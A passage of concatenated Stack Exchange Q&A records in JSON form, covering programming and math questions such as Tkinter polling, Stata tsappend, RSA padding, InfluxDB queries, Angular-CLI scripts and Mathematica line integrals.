seconds remaining and 20.01 second remaining?\nComment: I agree with that, the problem is that I'm pushing data to a queue very quickly (a callback function), and if I only update every second, I think I would just have to flush the queue and get the most recent entry. 
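A minimal sketch of the drain-the-queue pattern being described (the progress bar and queue names are hypothetical): the worker can push values as fast as it likes, the GUI thread wakes every 100 ms, throws away everything but the newest value, and touches the widget exactly once per tick.
<code>
import queue
import tkinter as tk
from tkinter import ttk

progress_queue = queue.Queue()          # worker thread calls progress_queue.put(percent)

root = tk.Tk()
bar = ttk.Progressbar(root, maximum=100)
bar.pack(fill="x", padx=10, pady=10)

def poll_queue():
    latest = None
    try:
        while True:                     # drain everything that arrived since the last tick
            latest = progress_queue.get_nowait()
    except queue.Empty:
        pass
    if latest is not None:
        bar["value"] = latest           # only the most recent value reaches the widget
    root.after(100, poll_queue)         # reschedule; all widget access stays on the main thread

root.after(100, poll_queue)
root.mainloop()
<\/code>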
Is there a trick for this?\n","meta":{"source":"stackoverflow","title":"Does Tkinter have a fixed or repeating update loop that I can use?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I add extra years to a time series dataset using tsappend?\n\nQuestion: Consider the following example code:\n<code>clear\nset obs 20\n\ngenerate t = 2000 + _n\n\ntsset t, yearly\ntsappend, last(2025) tsfmt(ty)\n<\/code>\nThis crashes with the error below:\n<code>unknown function ty()\nr(133);\n<\/code>\nHowever, according to the Stata 15 documentation for tsappend, the <code>ty<\/code> argument to the <code>tsfmt<\/code> option should be supported (even though there is not actually a <code>ty()<\/code> function in Stata).\n\nI know I can do this with a little math and either the <code>add<\/code> option to <code>tsappend<\/code> or, separately, the <code>expand<\/code> command, but I am trying to figure out why the documentation does not function as described.\nI am using Stata\/MP 15.1 for Unix (Linux 64-bit x86-64), Revision 26 Aug 2019 but I get the same error on Stata\/MP 15.1 for Windows.\nAnswer: The help file and manual of the <code>tsappend<\/code> command in all recent versions of Stata clearly states:\n\n\"tsfmt(string) specifies the name of the Stata time-series function to use in converting the date specified in last() to an integer. The function names are\n tc (clock), tC (Clock), td (daily), tw (weekly), tm (monthly), tq (quarterly), and th (half-yearly).\"\n\nThe functions <code>tc()<\/code>, <code>td()<\/code> etc. are all convenience functions in Stata jargon. Given that no <code>ty()<\/code> convenience function exists, the item in the list you present is likely a typo.\nA look in the manuals shows that the <code>%ty<\/code> format is associated with the following functions:\n\n<code>y()<\/code> \n<code>year()<\/code>\n<code>yearly()<\/code>\n\nHere, the <code>y()<\/code> function (last table item in Building SIFs from components) can be used:\n<code>clear\nset obs 20\n\ngenerate t = 2000 + _n\n\ntsset t, yearly\ntsappend, last(2025) tsfmt(y)\n<\/code>\n<code>list\n\n +------+\n | t |\n |------|\n 1. | 2001 |\n 2. | 2002 |\n 3. | 2003 |\n 4. | 2004 |\n 5. | 2005 |\n |------|\n 6. | 2006 |\n 7. | 2007 |\n 8. | 2008 |\n 9. | 2009 |\n 10. | 2010 |\n |------|\n 11. | 2011 |\n 12. | 2012 |\n 13. | 2013 |\n 14. | 2014 |\n 15. | 2015 |\n |------|\n 16. | 2016 |\n 17. | 2017 |\n 18. | 2018 |\n 19. | 2019 |\n 20. | 2020 |\n |------|\n 21. | 2021 |\n 22. | 2022 |\n 23. | 2023 |\n 24. | 2024 |\n 25. | 2025 |\n +------+\n<\/code>\nFor learning purposes, inspection of the source code for <code>tsappend<\/code> can confirm why this in fact works.\nIn the <code>_tsappend3<\/code> sub-command, which handles this combination of options we see that:\n<code>local lastt `=`tsfmt'(`last')'\n<\/code>\nFor <code>tsfmt()<\/code> specified as <code>y<\/code> we then get:\n<code>local lastt `=y(2025)'\n<\/code>\nThis is equal to <code>2025<\/code> - type <code>display y(2025)<\/code> to confirm.\nFurther down the code we also see the following:\n<code>gen `add' = max((`lastt' - `tmax') \/ `delta' + 1, 1) if `touse'\n<\/code>\nThe generated variable is then used to <code>expand<\/code> the dataset.\n","meta":{"source":"stackoverflow","title":"How do I add extra years to a time series dataset using tsappend?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Vista, inifiles, and run at startup oddities... 
what the heck\n\nQuestion: I've got something happening with a little app that I made that I don't understand what the problem is. The app is just a little texted panel clock that sits above the taskbar on the second monitor. Settings are saved via inifile in the proper appdata folder, and the specs are saved properly, i.e. X and Y location, font, font style, etc.\nI wanted it to run automatically when Windows boots up, so yesterday I just dragged a shortcut to the Start | Programs | Startup folder. This morning when booting up, for a moment, it loaded in the proper location, then quickly moved itself back to 0 by 0 on the X-Y plane. I looked at the inifile, and sure enough... it's Top=1133 Left=1920, just like it is supposed to be, yet windows starts it at Top=0 Left=0.\nWhat the heck?...\nAnswer: Check that you have the 'position=poDesigned' as well. If you dont, it will use that setting preferentially. If this is ok, put a fixed offset in your X&Y properties to see if that is where it is defaulting to. Ideally you should be setting your desired XY position no earlier than AfterCreation, do it in FormCreate if you can because by that time the form is all yours to play with.\nBrian.\nComment: Brian, You Da Man!\n\nThanks a bunch, that was it, as I had originally set the position at poDefault. Now I can copy and paste from the clipboard - the date, time, date and time, etc to my hearts content. :)\n","meta":{"source":"stackoverflow","title":"Vista, inifiles, and run at startup oddities... what the heck","dup_signals":{}},"subset":"stackexchange"} +{"text":"Self Hosted WCF SSL\n\nQuestion: Just a quickie.\nI am not sure how to approach securing a self hosted WCF service with an SSL certificate. When buying an SSL certificate, I need to do a certificate request based on the FQDN.\nUsing a self hosted WCF service,\n\nHow do I generate a certificate request for a self hsoted WCF service?\nHow do I implement the F.Q.D.N. for a certificate for a self hosted service? The self hsoted service is accessed on a dynamic DNS name and a port.\n\nShould I just generate a self signed certificate and use that?\nRegards\nAnswer: The following link demonstrates the process and enumerates the steps for establishing a certificate signing request.\nhttp:\/\/technet.microsoft.com\/en-us\/library\/ff625722(v=ws.10).aspx \nWe specify the following for our self-hosted WCF SSL services: \nOn the Subject tab:\n1. In the Subject name area under Type, click Common Name.\n2. In the Subject name area under Value, enter the fully qualified domain name, and then click Add.\n3. In the Alternative name area under Type, click DNS.\n4. In the Alternative name area under Value, enter the fully qualified domain name, and then click Add. \nOn the Extensions tab:\n1. Click the Key usage arrow. In the Available options list, click Digital signature, and then click Add. Click Key encipherment, and then click Add.\n2. Click the Extended Key Usage (application policies) arrow. In the Available options list, click Server Authentication and Client Authentication, and then click Add.\nAnswer: The SSL certificate has two parts to it that you need to know about. The first is the host. This is sent back to the client, so they can verify that the SSL certificate is for what you THINK you were connecting to.\nSo your host name NEEDS to match the address you are using to connect to the WCF service.\nThe second part is the signature. This is to verify the SSL certificate has not been changed since it was issued. 
Think of it as a Counter Signature on your rental agreement.\nNow what a Self Signed certificate means...well its exactly what it says on the tin. Your computer signed it. Where as normally you would pay a Certificate Authority to sign it (think of it like getting a Judge to Counter Sign your rental agreement).\nSo the down side of the Self Signed cert is that no one trusts it, and for good reason.\nFor 99% of cases, your self signed cert is not going to be trusted by anyone.\n","meta":{"source":"stackoverflow","title":"Self Hosted WCF SSL","dup_signals":{}},"subset":"stackexchange"} +{"text":"JQuery - converting JS to JQuery for generating table that allows parsing URL parameters\n\nQuestion: I have a problem with transforming my vanilla JS code to JQuery. I need to take parameter values from URL.\nFor example: \n\nlocalhost:63342\/2018-11-13-html\/form_sent.html?phone=4325325235&adress=testadress&order=book1&order=book2&deliverydate=datadostawy&deliverymethod=chinamail&agree=on\n\nMy current attempt is producing [Object object] in place of the values it's supposed to be throwing out.\n<code>function createSimpleRow(header, value) {\n const urlParams = new URLSearchParams(window.location.search);\n return $(\"<tr><\/tr>\").append($(\"<th><\/th>\").text(header)).append($(\"<td><\/td>\").text(`${urlParams.getAll(value)}`));\n}\n\nfunction readBookOrder(booklist) {\n const list = document.getElementById(booklist);\n const table = document.createElement(\"table\");\n\n table.append(createSimpleRow(\"phone\", `phone`));\n table.append(createSimpleRow(\"adress\", `adress`));\n\n list.appendChild(table);\n return list;\n}\n<\/code>\nMy old code is a mix of Jquery and pure JS and it seems to be working correctly, giving out all the values I've specified to take from the URL.\n<code>function readBookOrder(booklist) {\n const list = document.getElementById(booklist);\n const table = document.createElement(\"table\");\n\n const tr = document.createElement(\"tr\");\n const td1 = document.createElement(\"td\");\n td1.innerHTML = `${urlParams.get(\"phone\")}`;\n tr.appendChild(td1);\n const td2 = document.createElement(\"td\");\n td2.innerHTML = `${urlParams.get(\"adress\")}`;\n tr.appendChild(td2);\n const td3 = document.createElement(\"td\");\n td3.innerHTML = `${urlParams.getAll(\"order\")}`;\n tr.appendChild(td3);\n const td4 = document.createElement(\"td\");\n td4.innerHTML = `${urlParams.get(\"deliverydate\")}`;\n tr.appendChild(td4);\n const td5 = document.createElement(\"td\");\n td5.innerHTML = `${urlParams.get(\"deliverymethod\")}`;\n tr.appendChild(td5);\n\n table.appendChild(tr);\n list.appendChild(table);\n return list;\n}\n<\/code>\nCan someone suggest what is that I'm missing out during the convertion to the JQuery standard?\nComment: Because `createSimpleRow()` returns an jQuery context (which is basically on `Object` that encapsulates the nodes you created) that you're trying to `append()` to a native element. 
Try to append `[0]` at the end of your `return` statement to fix this\nAnswer: Since <code>createSimpleRow()<\/code> now returns a <code>jQuery<\/code> object you can't append that object directly with native DOM methods.\nConvert <code>readBookOrder()<\/code> to use <code>jQuery<\/code> methods instead that allow for inserting other jQuery objects\n<code>function readBookOrder(booklist) {\n const $list = $(`#${booklist}`);\n const $table = $(\"<table>\");\n\n ['phone', 'adress'].forEach(e => $table.append(createSimpleRow(e, e)) ); \n\n $list.append($table);\n return $list;\n}\n<\/code>\nThe convention of adding a <code>$<\/code> prefix to variable names is a common one to reflect that the variable contains a jQuery object\nComment: Thank you! Now I see why so many methods weren't working. Guess I have to learn quite a lot.\n","meta":{"source":"stackoverflow","title":"JQuery - converting JS to JQuery for generating table that allows parsing URL parameters","dup_signals":{}},"subset":"stackexchange"} +{"text":"'Unsupported template dependency: Upgrade your Android Eclipse plugin' with SDK Tools v22\n\nQuestion: I recently upgraded my Android SDK Tools to version 22. But whenever I am trying to create a new project in Eclipse, I get an error message:\n\nUnsupported template dependency: Upgrade your Android Eclipse plugin\n\nHow can I fix this problem?\nComment: The following link helped me evade the problem:\n\nhttp:\/\/stackoverflow.com\/questions\/18839428\/issues-when-create-new-android-application-project-in-eclipse\/18849033#18849033\nComment: Does your dialog show blank in the 'Required Version' field, which is what I'm seeing? It would explain why the upgrade version on the dialog doesn't do anything.\nAnswer: Download from http:\/\/dl-ssl.google.com\/android\/repository\/tools_r22-windows.zip, unzip it and replace the \/tools folder with this one to downgrade the sdk tools. There's a bug in version 22.\nFor Mac http:\/\/dl-ssl.google.com\/android\/repository\/tools_r22-macosx.zip\nFor Linux: http:\/\/dl-ssl.google.com\/android\/repository\/tools_r22-linux.zip\nComment: This left me with an error saying ...tools\/emulator not found, which went away when I copied 'emulator' from the 'bad' version of tools that I had moved out of the way. (OS X Mountain Lion by the way)\nComment: It's a *known* issue being worked at the moment. See https:\/\/code.google.com\/p\/android\/issues\/detail?id=60149 for progress and workaround discussion.\nComment: @user1681572 try again, it works for me on 10.7.5.\nAnswer: The project member posted comment #55 that solves this issue without downloading the SDK tools. Just download the activity templates and replace the <code>sdk\/tools\/templates\/activities<\/code> folder with the contents of the ZIP file.\nYou may need to restart Eclipse with the <code>-clean<\/code> option for it to work.\nComment: +1 for explaining the cause of this problem, thx. By the way, this answer would be more complete if you add a direct link to the file need to fix the problem.\nAnswer: From Eclipse go to Help > Check for updates and install any of the updates that Eclipse shows. \nOnce you update the SDK components you always usually need to update the Eclipse plugins as well. \nComment: This made no difference for me.\nComment: Run the SDK manager again and ensure everything is up to date, and run the eclipse updater again. 
Maybe https:\/\/code.google.com\/p\/android\/issues\/detail?id=60149 will also help\nAnswer: I started facing the same issue yesterday when I upgraded to the latest Android SDK Tools (22.2). So I reverted back the changes and am now using Android SDK Tool (22.0.5) and it works fine. \nTry downgrading Android SDK Tools.\n","meta":{"source":"stackoverflow","title":"'Unsupported template dependency: Upgrade your Android Eclipse plugin' with SDK Tools v22","dup_signals":{}},"subset":"stackexchange"} +{"text":"Adjust Image on Screen while Zoom Out\n\nQuestion: While zooming in the Image area goes out off screen. I want it to remain fixed in place\n\n<code><img style=\"margin-bottom:-10px;width:280px;height:280px;border-adius:50%\n;border:3px solid white\" id=\"image\" src=\"@Model.Image\" \/> <br \/>\n\n<a id=\"editbutton\" href=\"#\"><i style=\"border:3px solid white;border-radius:80%;\n padding:12px;z-index:5000;background-color:#128edb;font-size:15px;margin-left:40%;margin-top:-200px;color:white;\" class=\"fa fa-pencil\"><\/i><\/a> <\/code>\n\nenter image description here\nComment: Can you replicate your problem in a code snippet?\nComment: Please explain what is your requirement well\nComment: Image should not go out off screen while I zoom Out\nComment: Its size should be reduced only but remain fix in its position\nAnswer: You need to make some changes in your css and html .Please check the below snippet code.\nYou can adjust the edit icon position with change the <code>right<\/code> and <code>bottom<\/code> value in <code>#editbutton<\/code> element.\n\n<code>.imgWrap{position:relative;width:280px;height:280px;}\n#editbutton{position:absolute;right:-20px;bottom:-20px}<\/code>\n<code><div class=\"imgWrap\">\n<img style=\"margin-bottom:-10px;width:280px;height:280px;border-adius:50%\n;border:3px solid white\" id=\"image\" src=\"@Model.Image\" \/> <br \/>\n\n<a id=\"editbutton\" href=\"#\"><i style=\"border:3px solid white;border-radius:80%;\n padding:12px;background-color:#128edb;font-size:15px;color:white;\" class=\"fa fa-pencil\"><\/i><\/a>\n <div><\/code>\n\nIt will helps you. :)\n","meta":{"source":"stackoverflow","title":"Adjust Image on Screen while Zoom Out","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can duplication of encrypted characters lead to a weakness in RSA?\n\nQuestion: Of course, I know RSA is to widely used and tested to have any legitimate threats, but I still am confused by this.\nI have been trying to implement C++ (in a effort to learn how it works, not to be used in production), and I stumbled upon a C++ program online. When I run the program, it generates two random primes and uses it in the algorithm. The problem is that when the encrypted data goes by, each encrypted character is the same. Now, is this an implementation problem, or something else? Can someone please explain why this isn't considered a vulnerability?\nAn example - \n<code>YOUR TWO RANDOM PRIMES ARE 117 AND 127\n\nENTER A MESSAGE TO ENCRYPT: hello\n\nENCRYPTED: \n3146\n3221\n11184\n11184\n1662\n<\/code>\nNow, obviously an attacker (MiTM, to the best of my knowledge) can conclude that in the message, the third and fourth character in the message are the same.\nTo repeat, is this a problem with the RSA implementation? Is it overlooked because no one can logically conclude <code>11184<\/code> is <code>l<\/code>?\nEDIT: I am aware that 117 and 127 are extremely to low to be used in anything that needs to be secure. 
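As the answers below spell out, real-world RSA adds randomized padding, so identical plaintext blocks stop producing identical ciphertexts. A small illustrative sketch, written in Python with the third-party <code>cryptography</code> package purely for brevity (the question's code is C++):
<code>
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
pub = key.public_key()

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

c1 = pub.encrypt(b"l", oaep)   # the same plaintext encrypted twice...
c2 = pub.encrypt(b"l", oaep)
print(c1 == c2)                # ...yields different ciphertexts: prints False
<\/code>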
The actual primes aren't relavant to my question unless they have something to do with why 11184 and 11184 are the same.\nAnswer: \nTo repeat, is this a problem with the RSA implementation?\n\nIt would certainly not be overlooked; it would be considered a serious security issue.\nInstead, it is an issue with this implementation; there are two ways this implementation isn't realistic:\nFor one, the primes is uses are extremely tiny. Real implementations use primes that may be over 300 digits each (actually, we usually state the size of the primes in bits, not digits); with that, we can encrypt moderate sized messages directly; the string \"hello\" would easily fit.\nFor another (and more relevant), we always use randomized padding before doing RSA encryption. That is, we don't give the string directly to the low level RSA function (which would have nonobvious security issues); instead, we convert the string into large integer, and include a number of random bits; these random bits mean that, even if we encrypt the same string multiple times, we'll always end up with different integers (and so at the end, every RSA encryption will look different).\nAnswer: You are encrypting one character at a time and not padding or adding randomness. \nThis is not a secure way of using RSA or in fact any cipher. Though normally we don't apply RSA to the message directly but rather use a symmetric cipher first and only use assymetric ciphers for the key. More important is padding. \nAny time you use RSA you want to add random padding to prevent not only identifying repeating but also related plain texts. \nTry reading about: https:\/\/en.wikipedia.org\/wiki\/Optimal_asymmetric_encryption_padding \nWhich will protect against identifying repeat encryption of same message as well as many other potential attacks which may be possible with no\/naive padding. This gives an all or nothing, if you don't have all of the padded message you can't get any information about the pre padding message.\n","meta":{"source":"crypto.stackexchange","title":"Can duplication of encrypted characters lead to a weakness in RSA?","dup_signals":{}},"subset":"stackexchange"} +{"text":"influxdb: how to filter query by stddev\n\nQuestion: I tried to filter out incorrect peaks from my temperature measurements. For instance I have a mean of 15\u00b0C with little variation. But sometimes my sensor sends 0\u00b0C or 4\u00b0C, which is a sending error. I tried\n<code>select temperature from \"sensor\" where temperature > mean(temperature) - stddev(temperature)<\/code>\nthis seems to work. However, the upper bound does not:\n<code>select temperature from \"sensor\" where temperature < mean(temperature) + stddev(temperature)<\/code>\nThis simply reveals\n\nSuccess! (no results to display)\n\nEven worse is that\n<code>select temperature from \"sensor\" where temperature < max(temperature)<\/code>\nalso reveals\n\nSuccess! (no results to display)\n\nwhich seems to be a bug to me. Any suggestions?\nComment: > this seems to work. \n\nIt is not working. The query was not malformed and was properly received, so the Admin UI is reporting \"Success\" but the \"No results to display\" means that nothing matched your query results.\n\nFunctions are not valid outside of the SELECT clause. 
It seems like a bug in the Admin UI that it is not reporting a syntax error.\n\nI would recommend using the [CLI](https:\/\/docs.influxdata.com\/influxdb\/v0.11\/tools\/shell\/) for all queries, as the Admin UI obscures too many things.\nAnswer: It sounds like what you want is \n<code>SELECT temperature FROM sensor WHERE temperature > 4<\/code>\nTo accomplish your original goal of using a STDDEV and MEAN to eliminate out of scope values, look into Kapacitor. It is the batch\/stream processing companion to InfluxDB and supports arbitrary user defined functions, as well as maintaining state over time. There are no subfunctions or HAVING clause yet in InfluxDB, so it cannot do what you desire.\n","meta":{"source":"stackoverflow","title":"influxdb: how to filter query by stddev","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to set padding of Gatsby Link Component to 0px with styled-components\n\nQuestion: I have made some style changes to the Gatsby Link component using styled-components. However for some reason, when i try to apply a padding of 0px, it still leaves a tiny space (few px) above\/below the text (between text and top\/bottom border). I used gatsby-default-starter in a codesandbox for the initial build. \nHTML\/CSS Env (codepen.io):\nhttps:\/\/codepen.io\/marti2221\/pen\/mNVJWZ\nGatsby Env (codesandbox):\nhttps:\/\/codesandbox.io\/s\/gatsby-paddinglink-spacing-gedtq\nI have tried applying padding via styled-components in a Gatsby environment, as well as a normal html\/css environment. When padding is set to 0px on the \"a\" tag in css\/html environment, there is no space around the text, as expected. However when i attempt to add the same padding to the gatsby Link component or even a regular a tag, in a gatsby environment, there is a tiny space between the text and my border. This leads to a larger padding on top\/bottom for my BtnLink than expected. I could adjust my padding accordingly, but i would like to know the root cause of this issue. \n<code> const StyledLink = styled(Link)`\n display: inline-block;\n font-family: sans-serif;\n border-radius: 25px;\n padding: 0px;\n text-decoration: none;\n border: 2px solid green;\n `\n const StyledA = styled.a`\n display: inline-block;\n font-family: sans-serif;\n border-radius: 25px;\n padding: 0px;\n text-decoration: none;\n border: 2px solid green;\n `\n\n const BtnLink = props => (\n <StyledLink {...props}>{props.children}<\/StyledLink>\n )\n\n const IndexPage = () => (\n <Layout>\n <BtnLink to=\"page-2\">Request Quote<\/BtnLink>\n <StyledA href=\"page-2\">Request Quotes<\/StyledA>\n <Link to=\"page-2\">Link<\/Link>\n <\/Layout>\n )\n<\/code>\nMy desired result is a gatsby Link component that can be styled the same as a regular link element (ie. 0px padding). My result is link text with some spacing around it in the Gatsby environment. When tested with regular HTML\/CSS, results are as expected (no spacing when padding is set to 0px)\nComment: Did you solve this?\nAnswer: You've already made a <code>styled(Link)<\/code> styledComponent, and saved it to the const <code>StyledLink<\/code>.\n<code>const StyledLink = styled(Link)`\n display: inline-block;\n font-family: sans-serif;\n border-radius: 25px;\n padding: 0px;\n text-decoration: none;\n border: 2px solid green;\n<\/code>\nHowever, this won't have any affect on a regular gatsby <code>Link<\/code> component. 
You still need to render this new <code>StyledLink<\/code> styledComponent instead of a gatsby <code>Link<\/code> component if you want to see that styled variation on your page. \n<code>const IndexPage = () => (\n<Layout>\n <BtnLink to=\"page-2\">Request Quote<\/BtnLink>\n <StyledA href=\"page-2\">Request Quotes<\/StyledA>\n <StyledLink to=\"page-2\">Link<\/StyledLink>\n<\/Layout>\n)\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to set padding of Gatsby Link Component to 0px with styled-components","dup_signals":{}},"subset":"stackexchange"} +{"text":"Properly configure scripts with Angular-CLI\n\nQuestion: Let's say I have a project which uses these JS libraries:\n\n<code>main.js<\/code> which has to be loaded in all pages\n<code>joe.js<\/code> which is a npm package to be loaded in all pages\n<code>bob.js<\/code> which is an old-style 3rd party JS library with no module defined to be loaded in all pages\n<code>max.js<\/code> which is a CommonJS library to be loaded on-demand in some components\n\nSo far, I succeded in:\n\nincluding <code>main.js<\/code> in the <code>scripts<\/code> property of <code>angular-cli.json<\/code>\nthe same as above for <code>joe.js<\/code> using relative paths (<code>..\/node_modules\/joe\/dist\/joe.js<\/code>)\n\nso they end up in the generated bundle that is loaded on every page.\nI had instead a lot of problems with the other two. So far I've managed to include <code>bob.js<\/code> in the bundle by wrapping it in a self-executing function:\n<code>(function() {\n \/\/ old code of bob.js\n })();\n<\/code>\nbut why? \nAnd I'm totally clueless on how to include\/bundle <code>max.js<\/code>...\nAnswer: For <code>main, joe and bob.js<\/code> you should do this:\nTo have the scripts available everywhere you can use the <code>src\/assets<\/code> folder in your angular-cli folder structure.\nAnd then include your scripts with: \n<code><script src=\"assets\/my-script.js\"><\/script>\n<\/code>\nAs an option you can get those dependencies from <code>node_modules<\/code> to <code>src\/assets<\/code> with a webpack. \nFor most cases using CDN is better option than all this.\n\nAs for <code>max.js<\/code> you i would create a service to conveniently inject it:\n<code>import { Injectable } from '@angular\/core';\n\n@Injectable()\nexport class MaxService {\n\n lib: any;\n constructor(){\n this.lib = require('max.js');\n }\n\n}\n<\/code>\nComment: Maybe I got it wrong or I was not clear about it, but in `\/assets\/` they are not bundled but copied \"as is\" which is not my intent (I'd like them all bundled and minified). With `angular-cli.json` anyway I managed somehow to bundle them together, so it's okay (besides, I use cdn's when possible, but I need also to understand the mechanics).\nInteresting the service bit about `max.js`, which seems to be my missing piece. Thanks, I'll try and let you know!\nComment: In your situation i would npm install the libraries, minify them directly from node\/modules and move them with webpack to src\/assets and include them from there as i explained. If you feel my asnwer helped you please upvote.\nComment: as I stated (and tagged) I am working with Angular-CLI, I cannot configure or use webpack directly by any means except for what the tool exposes, which is not much.\nI am *not* using webpack per-se.\nComment: Yes you can use webpack. 
Create a npm command that calls webpack yourself and use it as \"prebuild\".\n","meta":{"source":"stackoverflow","title":"Properly configure scripts with Angular-CLI","dup_signals":{}},"subset":"stackexchange"} +{"text":"Setting up a TransformedDistribution with random parameter\n\nQuestion: I would like to set up a transformed distribution as below:\nFor each draw from this transformed distribution, I would do the following:\n\nDraw x1 from X ~ U(0,1)\nDraw and output y1 from Y ~ U(0,x1)\n\nI tried setting up transformed distribution using:\n<code>TransformedDistribution[x2,\n {\n x1 \\[Distributed] UniformDistribution[{min1, max1}], \n x2 \\[Distributed] UniformDistribution[{min2, x1 }]\n }]\n<\/code>\nBut the above uses a fixed value for the second draw from the uniform distribution.\nThe corresponding R code for making draws is below where <code>n<\/code> is the number of draws needed:\n<code>draw.rand <- function(n) {\n list.rand <- lapply(1:n, function(i) {\n vec.max <- runif(1)\n vec.rand <- runif(1, min = 0, max = vec.max)\n vec.rand})\n unlist(list.rand)}\n\ndraw.rand(100)\n<\/code>\nEdit: I would like to evaluate the <code>CDF<\/code>, <code>PDF<\/code> of the new distribution.\nAnswer: Solution\nYou are after <code>ParameterMixtureDistribution<\/code>.\n<code>ClearAll[dist];\ndist[min2_, min1_, max1_] := ParameterMixtureDistribution[\n UniformDistribution[{min2, x1}]\n , x1 \\[Distributed] UniformDistribution[{min1, max1}]\n ];\n<\/code>\nYour example\n<code>PDF[dist[0, 0, 1], x]\n<\/code>\n\n<code>CDF[dist[0, 0, 1], x]\n<\/code>\n\n<code>Plot[\n Evaluate@PDF[dist[0, 0, 1], x]\n , {x, 0, 1.2}\n , PlotTheme -> \"Scientific\"\n , PlotRange -> {0, 5}\n ]\n<\/code>\n\nAnother example\n<code>PDF[dist[1, 2, 3]]\n<\/code>\n\n<code>Plot[\n Evaluate@PDF[dist[1, 2, 3], x]\n , {x, 0, 5}\n , PlotTheme -> \"Scientific\"\n ]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Setting up a TransformedDistribution with random parameter","dup_signals":{}},"subset":"stackexchange"} +{"text":"Line Integral Difficulty\n\nQuestion: I am having difficulty with the following question:\nCompute the line integral of \n$$f(x,y)=\\frac{xy}{1+x+2y},$$\nalong the unit quarter-circle in the first quadrant from (1,0) to (0,1).\nMy problem could either be a mathematic mistake or a Mathematica difficulty, I am not sure which.\nI define my function:\n<code>f[{x_, y_}] = x y\/(1 + x + 2 y)\n<\/code>\nThen I parametrize the unit quarter circle as follows:\n<code>r[t_] = {Cos[t], Sin[t]}\n<\/code>\nI am going to compute the integral\n$$\\int_0^{\\pi\/2} f(\\vec r(t))\\,|\\vec r\\,'(t)|\\,dt,$$\nso I perform this next:\n<code>integrand = f[r[t]] Sqrt[r'[t].r'[t]] \/\/ Simplify\n<\/code>\nThen I integrate and find a numerical approximation.\n<code>Integrate[integrand, {t, 0, \\[Pi]\/2}]\nN[%]\n\n(* 0.168183 *)\n<\/code>\nNow I do a second parametrization of the unit quarter circle, namely, I let $x=t$, then $y=\\sqrt{1-t^2}$, but here I will need to let my $t$-values vary from $t=1$ to $t=0$ in order for the parametrization to move again from the point (1,0) to the point (0,1). So I do this next:\n<code>r[t_] = {t, Sqrt[1 - t^2]}\n<\/code>\nThen I do this:\n<code>integrand = f[r[t]] Sqrt[r'[t].r'[t]] \/\/ Simplify\n<\/code>\nThen I integrate from $t=1$ to $t=0$ (and I am expecting the same answer as I got above):\n<code>Integrate[integrand, {t, 1, 0}]\n% \/\/ N\n\n(* -0.168183 *)\n<\/code>\nI got the negative of the answer above. \nSo, my question. 
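A quick hedged sanity check of the <code>ParameterMixtureDistribution</code> answer above: sampling with the original two-step scheme should reproduce the derived PDF (sample size arbitrary; assumes <code>dist</code> is already defined as in that answer):
<code>
manual = Table[RandomReal[{0, RandomReal[{0, 1}]}], {10^5}];  (* draw x1, then y ~ U(0, x1) *)

Show[
  Histogram[manual, 50, "PDF"],
  Plot[Evaluate@PDF[dist[0, 0, 1], x], {x, 0, 1}, PlotStyle -> Thick]
]
<\/code>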
Am I making some type of mathematical error in my thinking, or is there something strange happening with Mathematica?\nUpdate: MichaelE2 may be right. It may be the $\\Delta t$ problem, keeping it positive. In order to have the $t$-values go from $t=0$ to $t=1$, and to have the curve pass from (1,0) to (0,1), I am going to have to choose a different parametrization.\n<code>r[t_] = {1 - t, Sqrt[1 - (1 - t)^2]}\n<\/code>\nThen:\n<code>Manipulate[\n ParametricPlot[r[t], {t, 0, final}, PlotRange -> 1] \/. \n Line -> Arrow,\n {{final, 0.5}, 0.00001, 1}]\n<\/code>\n\nNow we integrate.\n<code>integrand = f[r[t]] Sqrt[r'[t].r'[t]] \/\/ Simplify;\nIntegrate[integrand, {t, 0, 1}];\n% \/\/ N\n\n(* 0.168183 *)\n<\/code>\nBut I am still going to have to take some more time thinking about this.\nComment: You can evaluate this integral symbolically using `Integrate[(x y)\/(1 + x + 2 y) \/. {x -> Cos[\\[Theta]], y -> Sin[\\[Theta]]}, {\\[Theta], 0, \\[Pi]\/2}]`.\nComment: The $ds$ in the integral represents $\\Delta s = \\sqrt{\\sum \\Delta x} = \\sqrt{\\sum x'(c_i)^2 \\Delta t_i^2} = \\sqrt{\\sum x'(c_i)^2}\\, |\\Delta t_i|$, which equals $ \\sqrt{\\sum x'(c_i)^2}\\, \\Delta t_i$ only if the $\\Delta t_i >0$, i.e., if you integrate from $t=0$ to $t=1$. (So I think there is a mathematical error in how you set up the second integral.)\nComment: @MichaelE2 I think I found what I needed (examples) at: [http:\/\/tutorial.math.lamar.edu\/Classes\/CalcIII\/LineIntegralsPtI.aspx](http:\/\/tutorial.math.lamar.edu\/Classes\/CalcIII\/LineIntegralsPtI.aspx) and [http:\/\/tutorial.math.lamar.edu\/Classes\/CalcIII\/LineIntegralsPtII.aspx](http:\/\/tutorial.math.lamar.edu\/Classes\/CalcIII\/LineIntegralsPtII.aspx). I am making a mathematical error.\nAnswer: \nNote the last condition, or consider limit of Riemann sum $\\Delta t=\\frac{b-a}{n}$.\nAs can be seen the expected integral should be positive:\n<code>f[x_, y_] := x y\/(1 + x + 2 y);\np3 = Plot3D[f[x, y], {x, 0, 1}, {y, 0, 1}, \n MeshFunctions -> (#1^2 + #2^2 &), Mesh -> {{1}}, \n PlotStyle -> Opacity[0.5]];\npp = ParametricPlot3D[{t, Sqrt[1 - t^2], f[t, u Sqrt[1 - t^2]]}, {t, \n 0, 1}, {u, 0, 1}, Mesh -> None, PlotStyle -> Blue];\nShow[p3, pp]\n<\/code>\n\nSee paramatrizations: $\\{x,y\\}\\mapsto\\{t,\\sqrt{1-t^2}\\}$, or$\\{x,y\\}\\mapsto\\{\\sqrt{1-t^2},t\\}$ for $0\\le t\\le 1$ or $\\{x,y\\}\\mapsto\\{\\cos (t),\\sin (t)\\}$ for $0\\le t\\le \\pi\/2$.\nSo,\n<code>NIntegrate[f[Sqrt[1 - t^2], t]\/Sqrt[1 - t^2], {t, 0, 1}]\nNIntegrate[f[t, Sqrt[1 - t^2]]\/Sqrt[1 - t^2], {t, 0, 